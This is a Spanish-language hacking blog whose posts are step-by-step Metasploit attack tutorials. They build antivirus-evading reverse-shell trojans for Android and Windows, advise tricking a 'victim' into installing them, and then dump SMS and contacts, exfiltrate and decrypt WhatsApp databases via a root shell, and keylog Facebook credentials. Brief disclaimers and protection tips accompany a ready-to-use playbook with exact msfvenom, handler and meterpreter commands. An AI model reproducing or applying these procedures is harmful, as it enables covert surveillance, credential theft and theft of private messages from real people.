:::: MENU ::::
  • Aprende a usar Kali Linux!

  • Usos del Metasploit!

  • Hacking Ético

Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas
Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas

miércoles, 13 de julio de 2016

Muy buenas, en esta ocasión les vengo a mostrar algo que muchas personas les interesa saber, y es nada mas y nada menos que encender la cámara de un celular víctima sin que este se percate de esa acción, este ataque lo pueden llevar a cabo los hackers si tienen el control de tu celular por alguna aplicación maliciosa que te hayas descargado.


Lo que se muestra el vídeo es primero la creación de un virus para android en forma de apk por medio del Payload Meterpreter realizando una conexión reversa.




¿Qué es esta conexión reversa?

Bueno cuando se crea el virus se escribe android/meterpreter/reverse_tcp, esto último a lo que llamamos conexión reversa, consiste en que es la víctima la que se conecta a nosotros y no nosotros a la víctima.

¿Por qué?

A principios de este nuevo siglo se usaba muchisimo lo que eran las conexiones directas, pero para eso la PC víctima o el dispositivo víctima debía tener abierto y vulnerable algún puerto, y esto lo utilizaban para entrar y apoderarse de su computadora.

Ahora ya no es así, debido a que nosotros modificamos los puertos de la siguiente manera:

Dentro de LAN: El puerto utilizado para ataques dentro de LAN puede ser cualquiera, ya que técnicamente ambos dispositivos comparten un mismo host que es el router en el que están conectados, así que no se necesita de algún puerto especial para su conexión, si embargo se recomienda no usar puertos que pueden estar utilizados por otras aplicaciones o por Windows, como el Puerto 80, o 8080.

Fuera de LAN: Para los ataques fuera de LAN o en su defecto WAN, se utiliza un puerto que nosotros mismos hayamos abierto, y debido a que es una conexión reversa, la víctima se conecta a nosotros por medio de ese puerto "vulnerable" que hemos abierto, esa es la diferencia entre las conexiones directas y conexiones reversas.(Ya que como se dijo, antes eramos nosotros los que nos conectábamos a la victima por medio de un puerto).
Además en ataques fuera de LAN el host que se utiliza puede ser la IP pública en caso que el router brinde una IP estática, o sino un host creado por ejemplo en NO-IP.

Así que eso sería todo, el tutorial en fotos estará proximamente.

¿Cómo me protejo ante esto?

* Descargar Aplicaciones de páginas de reputación como Playstore.
* No descargar Keygens ni nada que necesite permisos extraordinarios.
* Tener sentido común.
* No instalar cualquier aplicación en el celular.
* Tener analizadores de aplicaciones antes y después de instalarse en el Smartphone.
* Tener actualizadas las aplicaciones, las actualizaciones pueden traer parches de seguridad que mejorarán su privacidad.

IMPORTANTE!

* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado a mi smartphone y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca

viernes, 8 de julio de 2016

Hola muyyy buenas, este tema de desencriptar bases de datos de WhatsApp se ve mucho por Internet, sin embargo todos esos post, publicaciones, vídeos y demás están desactualizados, la mayoría muestran como desencriptar Bases de datos Crypt 8 y abajo de esta, si embargo sabemos que WhatsApp ya no encripta sus bases de datos en Crypt8, sino que lo hace en nuevos como Crypt 10, Crypt 11, Crypt 12.



En este post mostraré como lograr desencriptar este tipo de base de datos, también las versiones viejas, en realidad es más fácil de lo que se cree, pero puede demorar un poquito (Después de todo la paciencia será la clave del éxito).

El motivo de este post es para que vean que aunque WhatsApp ha hecho muchísimo trabajo con proteger nuestra privacidad han puesto toda la seguridad en la puerta delantera, pero se han olvidado de su puerta trasera, y esto es aprovechado por los cibercriminales para la obtención de tus conversaciones, imágenes y demás.

Antes sugiero que leas la Nota que dice IMPORTANTE, al final del post, así evitarás malentendidos y por consiguiente sabrás completamente el propósito de estos post.

Como siempre vamos a ver los:

Requisitos:

* Primero que nada deberás saber cómo obtener una base de datos de WhatsApp con un virus, esto se aprenderá en uno de los post que ya he hecho aquí.


* Deberás tener descargado el siguiente Software, este nos ayudará a ver gráficamente la base de datos que hemos desencriptado con la herramienta que en el post mencionaré.

* Trabajaremos en Kali Linux, por lo tanto es necesario para casi todos los tutoriales de este blog que tengas instalado el Kali Linux en una Máquina Virtual, en este Link tienes el tutorial de Instalación correcta de esta Distribución.

* Como no obligatorio puedes ver el Funcionamiento de este pequeño virus en el siguiente Post, que explica un procedimiento mas fácil que el que se mostrará en este post y pues se aprenderá un poco de lo que estamos haciendo, en el post se explica como hackear los mensajes de text y los contactos de un smartphone víctima.

Notas:

* Los ataques aquí realizados se aplican para ataques en LAN, si embargo el proceso de desencriptación es lo mismo por si se hace en WAN.


* El ataque se hace para ver que no estamos del todo seguros con este tipo de aplicaciones.

Procedimiento:

1) Primero vamos a sacar la base de datos de WhatsApp:


El tutorial lo dejé en los Requisitos, pero también puedes dar click aquí.

Para desencriptar la base de datos que obtuvimos necesitamos tener una Key, eso es lo que vamos a obtener en los siguientes pasos.

2) Acceder a la Shell:

Entonces debemos estar ya con una sesión abierta de Meterpreter, así podremos seguir, vamos a acceder ahora a la Shell.

Para eso pondremos en los comandos de Meterpreter:


shell

Luego vamos a pedir permiso de Superusuario, deberemos escribir:


su

Si no les deja puede que el teléfono no esté rooteado, para ver eso pueden salirse de la Shell con Crtl + C y ponen check_root.


Y ahora necesitamos copiar la key a la tarjeta SD del Smartphone víctima, para eso debemos ir a la ruta y copiar el archivo, todo eso se hace de la siguiente manera:

cd /data/data/com.whatsapp/files
cp key /sdcard/

Este proceso se puede ver fácilmente en la siguiente imagen. (La imagen no muestra cuando puse shell, esto es porque posteriormente le di "clear" para que me mostrara todo mas limpio.




3) Descargando Key

Ya nos podemos salir de la shell, para eso precionamos Crtl + C y le damos ( y ) para luego darle Enter.


Para descargar la Key, simplemente necesitamos usar el comando download, como ya tenemos copiada nuestra Key a la Sdcard, sólamente vamos a escribir:


download /sdcard/key /root/Escritorio/


NOTA: Muchas veces se puede tener el Kali en Ingles, por lo tanto se debe cambiar "Escritorio" por "Desktop".

Con el comando, estamos descargando la Key y mandandola a nuestro escritorio, a continuación veremos la imagen que demuestra lo anterior.



4) Desencriptando la Base de datos.

Ahora ya tenemos la Key y la Base de datos, este es el lugar donde muchas personas se quedan varadas porque no pueden desencriptar una base de datos que sea mayor a Crypt 8, pero eso lo vamos a solucionar fácilmente.

Aquí vemos los archivos que hemos obtenido hasta ahora:



Ahí esta la Key, y la base de datos (En mi caso tenia pocas conversaciones de WhatsApp, por eso es pequeña, pero la base de datos que ustedes tengan puede que pese 50mb o mas, o menos, dependiendo de cuánta información haya.).

5) Subiendo datos a la plataforma para desencriptar.

Ya con todo eso obtenido vamos a irnos a la Web http://whatcrypt.com/, nos vamos a ir donde dice "Upload Your Crypt 6-12 Key", y como se imaginarán aquí subiremos solamente la Key que obtuvimos.


Aquí la imagen para que se guíen mejor.



6) La Magia casi terminada

En este punto ya está casi terminado todo, vamos a irnos donde dice "Decrypt WhatsApp Database", aquí vamos a subir nuestra base de datos que descargamos, y como podemos ver puede ser desde Crypt 5 hasta Crypt 12 que en el momento de la creación de este post es la mas actual.


Solamente subimos la base de datos y no tocaremos nada.



Ya subida, le vamos a dar donde dice "Process / Download Zip", y vamos a esperar (Este proceso puede durar muchísimo dependiendo del peso de la base de datos, en ocaciones puede durar hasta media hora, pero tranquilos que al final se les descargará un archivo como este:



Ahora mucho OJO, desactiven temporalmente el Internet Download Manager (Si es que lo tienen), porque cuando la página termina de desencriptar, el IDM bloquea la descarga, (Bueno, de hecho es el host el que bloquea, al parecer WhatsApp Decrypt no permite que descarguen de sus servidores con IDM)

Cuando tengan la base de datos desencriptada en Zip, les aparecerán los siguientes archivos:



Ahora ya está todo listo. Vamos al siguiente Paso.

7) Magia Terminada!!!!


Bueno chicuel@s, abrimos la herramienta de WhatsApp Viewer y le damos en → File → Open.

Aquí le daremos a los ( ... ) que aparecen y buscaremos el Archivo Siguiente.



Cuando ya lo escojamos podremos darle en OK.



PUMMM!!!!! MAGIA!!!!!.
Tendremos las conversaciones de WhatsApp de la persona víctima.



Como se puede ver, es relativamente fácil, luego de obtener el control de una víctima robar sus datos, y cosas por el estilo, por eso hay que estar muy atentos a cualquier cosa. Hay que tener mucho cuidado a las aplicaciones que se les da privilegio root, ya que como vemos sin root este proceso sería más complejo.


¿Cómo me protejo ante esto?

* Descargar Aplicaciones de páginas de reputación como Playstore.
* No descargar Keygens ni nada que necesite permisos extraordinarios.
* Tener sentido común.
* No instalar cualquier aplicación en el celular.
* Tener analizadores de aplicaciones antes y después de instalarse en el Smartphone.
* Tener actualizadas las aplicaciones, las actualizaciones pueden traer parches de seguridad que mejorarán su privacidad.

IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca

lunes, 27 de junio de 2016

Es normal al hablar de Metasploit, encontrarnos con que este se trabaja usualmente en distribuciones dedicadas mas que nada al Pentesting o Hacking Ético.


Sin embargo es posible instalar Metasploit Framework para trabajarlo en Windows (Incluso en Smartphones android por ejemplo), ya que es multiplataforma. En este post de indicará de manera sencilla cómo instalar Metasploit Framework en Windows para los que no desean tener una distribución de pentesting o que simplemente quieren aprender a instalarlo en el sistema Operativo mas usado por usuarios de casa.

Primero necesitaremos:

* Metasploit Framework para Windows, este se puede descargar normalmente en este Link http://windows.metasploit.com/metasploitframework-latest.msi.
* Una PC con Windows.
* Una imagen .ico de metasploit, esta se puede descargar de Aquí.

Procedimiento:

Cuando descarguemos el Metasploit vamos a abrirlo y aparecerá lo siguiente:


Vamos a aceptar los términos y le damos en Siguiente:


Le damos en siguiente y luego en Instalar, vamos a esperar un momento.


Ahora que termine de instalar vamos a la carpeta de Instalación del Metasploit, si no la cambiaste estará en C:/metasploit/, aquí vamos a crear un acceso directo del archivo dev_msfconsole.dat o en su defecto msfconsole.bat (Me encargué de llevar el acceso directo a una carpeta), vamos a Propiedades del acceso directo y le cambiaremos el icono (Si aparece una ventana de que el archivo no tiene icono, solamente denle aceptar)



Aquí buscaremos el ícono que descargamos en la parte de arriba, y se lo vamos a asignar, de esta manera, aceptamos los cambios y tendremos completado la Instalación correcta del Metasploit en Windows.



TERMINADO!!!!
Ahora ya se pueden utilizar las herramientas que nos proporciona Metasploit en Windows.



IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

* No me hago responsable de los daños que le puedan dar a su PC el uso de estas herramientas, todo esta bajo su responsabilidad.

* Es recomendable tener todas estas herramientas en una VM.








domingo, 19 de junio de 2016

Las personas usualmente descargan a diestra y siniestra, aceptan acuerdos (Sin leerlos) con las páginas de los programas que descargan, obviamente eso puede ser aprovechado por las mismas.

Este tutorial está disponible en video da click aquí para verlo.



En este post mostraré cómo hackear un facebook, la contraseña y el correo de la víctima, utilizando el metasploit framework y una herramienta que nos ayudara para crear un Virus Indetectable.

Primero antes que nada, en esta entrada se verá una herramienta poderosa que nos ayudará a crear exploits con el Payload windows/meterpreter/reverse_tcp, y se encargará de dejarlo lo más indetectable a los Antivirus Actuales, (tanto así que puedes escanearlo con el antivirus que tengas y tu antimalware de preferencia y verás que no lo detecta como Troyano).

El ataque que se llevará a cabo se hará dentro de la Red Local, osea, no se ataca a otra persona que esté fuera de mi LAN. Este ataqué si se puede llevar a cabo fuera de la Red local, y es precisamente de esta manera que lo llevan a cabo los hackers para infectar PC's de todo el mundo, es decir, independientemente que estén en su red o estén del otro lado del mundo.

Vamos a ver los Requisitos:

* Necesitamos tener Mermaid, que será el Software Gratuito que utilizaremos para la creación del exploit que infectará a la Víctima, lo podemos descargar en el siguiente enlace: http://shink.in/yzUr6

* Obviamente necesitaremos Kali Linux, con este entraremos en la consola Metasploit, para abrir un handler de escucha a nuestro exploit con los parámetros que le demos al momento de crearlo.

PROCESO:

Primero vamos a descomprimir el archivo Mermaid.rar que descargaron en el link de arriba.
Vamos a ver dos carpetas y algunos archivos, procederemos a abrir el archivo con la Extensión de Java, (.jar). Por tanto abrimos el archivo Mermaid.jar, y si nos aparece un cartel le damos en Aceptar.



Con el programa abierto vamos a darle en el Símbolo +, ahí agregaremos un nuevo "Perfil", donde ubicaremos las configuraciones de nuestro Payload, puertos y demás.

Así que en el primer cuadro de texto pondremos el nombre del perfil que tendremos, este puede ser cualquier nombre.

En IP/DNS vamos a ubicar la IP Local Privada del Kali Linux, esto es importante, para saberlo, primero ir a revisar el Kali Linux, abrir una consola dentro del mismo y ver la IP Privada con el comando ifconfig. Si no te queda claro, te invito a que veas los otros exploits creados en este blog con Kali Linux, así verás dónde ver la IP Local del Kali Linux.

En PORT vamos a poner el puerto que vamos a utilizar, en todas mis pruebas le pongo 7000, puede ser cualquier número, menos un número de puerto que sea utilizado.



Ahora en la pestaña siguiete vamos a ubicar en la parte de abajo el nombre que tendra interiormente la Aplicación, puede ser cualquier nombre, pero tiene que terminar en .exe.


Ahora procedemos a darle Save.

Verás que se a creado un perfil con el nombre que le hayas asignado, este estará en la parte en blanco del Mermaid, ahora le damos click y le damos al Botón BUILD.

Ahí, puedes tachar el recuadro de UPX si lo deseas, esto lo que hará es reducir un poco el tamaño del archivo que estamos generando.

Le das click en los tres puntos suspensivos, para elegir el lugar donde va a quedar el archivo que estamos creando (El virus), hay que guardarlo con la extensión .exe.



Ahora tendremos el Troyano creado.



Creado entonces podemos subirlo a Mega o a otra página de descargas que nos deje subirlo.
Ahora nos vamos a Kali Linux para encender el Handler de Escucha.

En Kali Linux vamos a abrir una nueva consola y vamos a poner esta secuencia de comandos.

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set lhost 192.168.1.10 → Esta tiene que ser la IP que le asignamos cuando lo creamos, que es la misma que la IP privada del Kali Linux.

set lport 7000 → Este es el puerto que especificamos cuando creamos el virus.

exploit

Ahí vamos a esperar que nuestra víctima abra el Virus que le hemos enviado, esta es la parte dificil aunque podrás convencerla con el método que prefieras, en mi caso lo estoy haciendo sobre una de mis máquinas viruales, específicamente en una Windows 10.



Cuando la víctima de doble click sobre el virus que le enviamos, inmediatamente se nos abrirá una sesión Meterpreter.

Eso era exactamente lo que queríamos, ahora tenemos control de su PC remotamente, la persona no sospechará ya que ni el Firewall, ni el Antivirus ni el Antimalware que tenga le detectará algo raro en el archivo que le enviamos.

En la pantalla de la víctima no aparecerá nada al ejecutar el archivo, así que pues es posible que llegue a borrar nuestro virus al ver que no funciona para nada esa aplicación, así que lo que recomiendo es fusionar ese virus con algún archivo real (Una imágen, canción, pdf) de esa manera la víctima abre digamos el archivo PDF, y al mismo tiempo y sin darse cuenta abre nuestro troyano.

En este caso, nos simplificamos la vida, y suponemos que descarga el virus y lo abre y de ahí no pasa nada mas.



Ahora, para obtener los credenciales de la persona podemos hacer varios métodos, en este caso abriré un Keylogger sobre la PC víctima para tener control de TODO lo que esta persona, así, si esta persona escribe algun correo o contraseña con su teclado, nosotros lo tendremos capturado.

Entonces en Kali Linux abrimos el Keylogger con:

keyscan_start

Podremos esperar mucho y luego ver todo lo que ha escrito, o podremos estar dando constantemente:

keyscan_dump

El comando anterior nos mostrará lo que la víctima haya escrito desde que abrió el Virus.
Veamos por ejemplo que la víctima nos dio su correo y contraseña de alguna plataforma, en este caso Facebook.



En este ejemplo cuando damos keyscan_dump, obtenemos lo siguiente.

facebook.com <Return> micorreo<Crtl> <Alt> <LCtrl> <RMenu> qcorreo.com <Tab> micontrase'a

Vamos a interpretar esto para saber que es lo que escribió.

Primero, al parecer escribió en Google "facebook.com", luego de esto a dado Enter.
Después de eso escribió "micorreo" y dio las teclas necesarias para poner @, si ves luego dice qcorreo.com, esto significa primero que la "q" es parte del @, (Para escribir @ se usa normalmente Alt + Q), y luego escribe correo.com.

De esta manera su correo electrónico es: micorreo@correo.com

Luego presionó TAB, esto indica que se movió de cuadro, para escribir en otro cuadro de texto, vemos que escribió: microntrase'a.
Sabemos que en el teclado de Estados Unidos no existe la Ñ, así que ese ( ' ) que vemos, es una ñ.

De esta manera su contraseña es: micontraseña

Hemos conseguido obtener la contraseña y correo de una persona que utilizó facebook, ahora podemos usar.

keyscan_stop

exit

exit

exit

Primero apagamos el Keylogger, y nos salimos de la consola meterpreter, ya hemos terminado.


Pruebas de Antivirus en NoDistribute.

Solamente 1/35 antivirus lo pudo detectar.
Sin embargo si no le activamos el UPX al momento de crearlo (El UPX es para bajar el peso del virus), si lo desactivamos esta prueba será de 0/35, osea que ningún antivirus lo detectará.


¿Cómo nos podemos proteger de estos ataques?
* No descargar aplicaciones o programas dudosos.
* No instalar aplicaciones o programas de sitios de dudosa reputación.
* Tener un buen suit de protección de Windows (Firewalls, Antivirus etc...)
* No entrar a páginas raras, o con una dirección url extraña.

IMPORTANTE!

* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado a mi PC y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.
* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

miércoles, 15 de junio de 2016

Puedes descargar esta guía completa para verla sin conexión en cualquiera de tus dispositivos compatibles con Microsoft Word desde aquí: http://ouo.io/w6sK5

WhatsApp una aplicación de mensajería donde podemos interactuar con seres queridos y no tan queridos enviando y recibiendo mensajes. fotos, vídeos etc...

Las conversaciones que tenemos día a día con personas por medio de esta aplicación de mensajería además de verse dentro de la misma aplicación, quedan guardadas en archivos encriptados dentro del teléfono, en una carpeta predeterminada por WhatsApp.

Si por curiosidad queremos obtener la base de datos encriptada de WhatsApp para ver nuestras conversaciones en la PC personal, entonces nosotros podríamos acceder directamente a ella navegando en nuestro celular hasta la ruta en que se encuentra el archivo encriptado.

Sin embargo, algunas personas mal intencionadas pueden robar esa información de tu Smartphone sin que te des cuenta, si instalas alguna aplicación que conceda demasiados permisos.

A continuación mostraré un método para acceder remotamente a esa base de datos desde Kali Linux.

Empecemos! Con las fechorias.

PROCEDIMIENTO:

Primero antes que nada puedes descargar esta guía: http://ouo.io/EPokCW de mi post https://cuculmecakali.blogspot.com/2016/06/android-obtener-contactos-y-mensajes-de.html De esta forma verás de manera mas prolija como se crea el exploit (Muchas más imágenes y explicación de algunos parámetros que pondremos)

Primero en el Kali Linux abrimos una consola y ponemos:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000 R > /root/Desktop/AplicacionWhatsapp.apk

En otros post mostraré como utilizar otros payloads, no sólamente con meterpreter.

Para saber qué poner en lhost deberás abrir otra terminal y ubicar:

ifconfig


Lo subimos a un servidor:
En mi caso lo subo a Mega.nz
Ahora, en la misma terminal abrimos una consola Metasploit con:

msfconsole



Pondremos:

use exploit/multi/handler

Ubicamos los parámetros del exploit que habíamos creado anteriormente.


set PAYLOAD android/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 7000

Además después de eso poner show options para observar que los parámetros están bien escritos y si nos falta algo mas.


Abrimos la escucha del Handler con:

exploit

Esperamos que la víctima instale y abra la aplicación (Para eso tendrán que convencerla que la instale y ejecute), cuando eso suceda entonces se abrirá una sesión Meterpreter.

Ahora van a ubicar:

cd /

Omitan lo que dice "Exploit" arriba, fue un error de parte mía.


Luego de ubicar cd /, van a poner:

ls

ls lo que hace es listar todo lo que esté contenido en la carpeta actual, entonces al ubicar ls, nos mostrará lo que esté en la raiz del sistema de Android (Carpeta que accedimos con cd /). Serán muchísimas carpetas.



Nos meteremos en la Sdcard, y luego listaremos lo que está dentro, con:

cd sdcard
ls


Obtendremos una cantidad enorme de archivos y carpetas, ahora nos interesa la carpeta de WhatsApp y listar lo que está dentro, por tanto utilizaremos.

cd Whatsapp
ls

OJO que hay que respetar siempre mayúsculas y minúsculas.

Obtendremos las carpetas dentro de WhatsApp, como se ve en WhatsApp hay una carpeta llamada "Databases", esa es la que contiene los archivos encriptados de los mensajes, por tanto accederemos a él y listaremos su contenido.

cd Databases
ls


Dentro estarán unos archivos encriptados por Whatsapp, en este caso están en crypt10, en el dispositivo que estén tratando puede variar.
Lo que necesitamos es descargar esa base de datos a nuestro Kali Linux, por eso utilizaremos.

download "AQUI ESTARÁ EL NOMBRE DEL ARCHIVO QUE DESCARGAREMOS"

Como se ve en la Imagen:


Entonces ahí tendremos la base de datos de WhatsApp de una persona.
Esas bases de datos estarán en la Carpeta Home de Kali Linux.


En un próximo post veremos como desencriptar esa base de datos, es decir la Crypt 10, (Aunque puede ser desde la Crypt 5 hasta la Crypt 12)

TERMINADO!

¿Cómo evitar estos ataques?

* No descargar aplicaciones dudosas.
* No instalar aplicaciones de sitios de dudosa reputación.
* Leer atentamente los permisos que se le dan a las aplicaciones.
* Tener un buen suit de protección de Android (Firewalls, Antivirus etc...)

* Tener WhatsApp actualizado, las nuevas actualizaciones brindan mayor seguridad a la base de datos, por lo tanto a los hackers se les hace más difícil su desencriptación.

IMPORTANTE!

* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado a mi smartphone y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.
* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca

martes, 14 de junio de 2016

Antes, para ver esta guía sin conexión puedes descargarla desde aquí para leerla en cualquier dispositivo compatible con Microsoft Word sin conexión a Internet: http://ouo.io/EPokCW

Este tutorial se encuentra en Video!. Puedes dar click aquí para verlo.

Sino pues continua leyendo.

Sin duda el Smartphone lo tenemos en el día a día, de hecho se podría decir que hasta nos hemos hecho dependientes del mismo.
Esta es una de las cosas que los Hackers de Sombrero Negro (Llamados Crackers) lo saben y lo entienden muy bien, por eso es necesario saber qué hacer para cuidarnos de ataques de los mismos, la mejor forma de aprender a defenderse es saber cómo actúan, como piensan sus fechorías.
En este Blog iremos aprendiendo solo un poco de lo que los Crackers pueden realizar a desprevenidos consumidores e iremos aprendiendo cómo evitar caer en sus trampas.
A continuación veremos que con Kali Linux una distribución basada en Debian GNU/Linux, se puede acceder a los Smartphones de las personas, en este caso a un Smartphone Android. 
1. Encender Kali Linux en una máquina Virtual o en tu PC.
Podemos utilizar una máquina virtual como VirtualBox o bien bootear una memoria usb y ubicarle la imagen ISO de Kali Linux.
2. Abrir una Consola de Kali Linux.
Para esto podemos irnos al icono negro de consola en la parte izquierda como muestra la Imagen.
3. Elegimos método y Payload.
Aquí estaremos eligiendo cuál es el Payload que usaremos para realizar el ataque con Metasploit, en este caso utilizaremos:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000

msfvenom: Indicará que utilizaremos Metasploit para el ataque.
-p: Indica a msfvenom que utilizaremos un payload.
android/meterpreter/reverse_tcp: Utilizaremos meterpreter por medio de una conexión reversa, esto quiere decir que es el dispositivo vícima el que abrirá con nosotros una sesión en Meterpreter.
lhost: Indica el host del "Virus", en este caso indicamos nuestra IP privada, la que nos da el Router para identificarnos dentro del host.
lport: Es el puerto que utilizaremos para el ataque, intentar no utilizar puertos normalmente usados como 80,4444, ya que puede estar siendo utilizado.
Para saber cual es la ip que ubicaremos en lhost podemos abrir otra terminal y ubicar el comando:

ifconfig



4. Elegimos la ruta del "Virus".
En este caso lo ubicaremos en el Escritorio con:

R > /root/Desktop/Nombredelarchivo.apk

Muchas veces dependiendo del idioma del Kali Linux, la ruta puede cambiar, por ejemplo, en lugar de ubicar "Desktop" se debe ubicar "Escritorio". De esta forma tendremos completo el comando que debemos ejecutar:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000 R > /root/Desktop/AplicacionVirus.apk

5. Ejecutar.
Presionar ENTER para crear el archivo APK, este quedará obviamente en la carpeta que hayamos tecleado. Como muestra a continuación el archivo está en Escritorio.
6. Subimos el archivo.
Podemos subir el archivo a la nube, o a alguna página de descargas, en este caso lo subí a Mega, de aquí se trata de hacer que la víctima se descargue el apk que hemos creado y la ejecute, pero eso será luego.
7. Abrir la consola Metasploit.
Para eso utilizaremos el comando:

msfconsole

De esta manera tendremos la consola abierta.
8. Usar el Handler y preparar Exploit.
Abrimos el Handler de escucha, esto esperará que la victima se conecte a nosotros, para eso usamos el comando:

use exploit/multi/handler


9. Set los parámetros que va a escuchar el Handler.
En este caso vamos a ubicarle los parámetros que el Handler en Metasploit estará esperando (Escuchando), por tanto daremos los parámetros que ubicamos en el archivo virus que creamos anteriormente.
Los comandos son los siguientes:

set PAYLOAD android/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 7000

Y luego comprobamos que todo esté bien tecleado con el comando:

show options

Se guian con la imagen que sigue.
10. Iniciar el Exploit.
Para eso usamos el comando:

exploit

De esta manera estaremos en escucha y espera a que nuestra víctima abra la aplicación maliciosa.
11. Obtener contactos y mensajes del smartphone.
Cuando el Smartphone abra la aplicación (Obviamente tú y el Smartphone tienen que tener conexión a Internet y estar dentro de la misma red LAN), se mostrará que se a abierto una sesión en Meterpreter.
Ahora con los comandos siguientes podremos obtener un archivo text de los mensajes y de los contactos del smartphone.

dump_sms
dump_contacts


Entonces al realizar los comando obtendremos archivos text que se guardaran en la carpeta Home del sistema (A esta se accede directamente del escritorio dando click en el icono de carpeta al lado derecho). Estos archivos contendrán los mensajes de texto enviados y recibidos del smartphone víctima así como sus contactos personales.

12. Salir de consolas.

Ahora puedes salir de las consolas, bien cerrando sesión con exit o cerrando la ventana del Metasploit, o explorar otras opciones.

Terminado!


Ahora ya sabes como los que usan Kali Linux pueden realizar este tipo de ataques y obtener tu información, por lo tanto la pregunta:
¿Cómo nos podemos proteger de estos ataques?
* No descargar aplicaciones dudosas.
* No instalar aplicaciones de sitios de dudosa reputación.
* Leer atentamente los permisos que se le dan a las aplicaciones.
* Tener un buen suit de protección de Android (Firewalls, Antivirus etc...)

IMPORTANTE!

* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado a mi smartphone y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.
* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca
A call-to-action text Contact us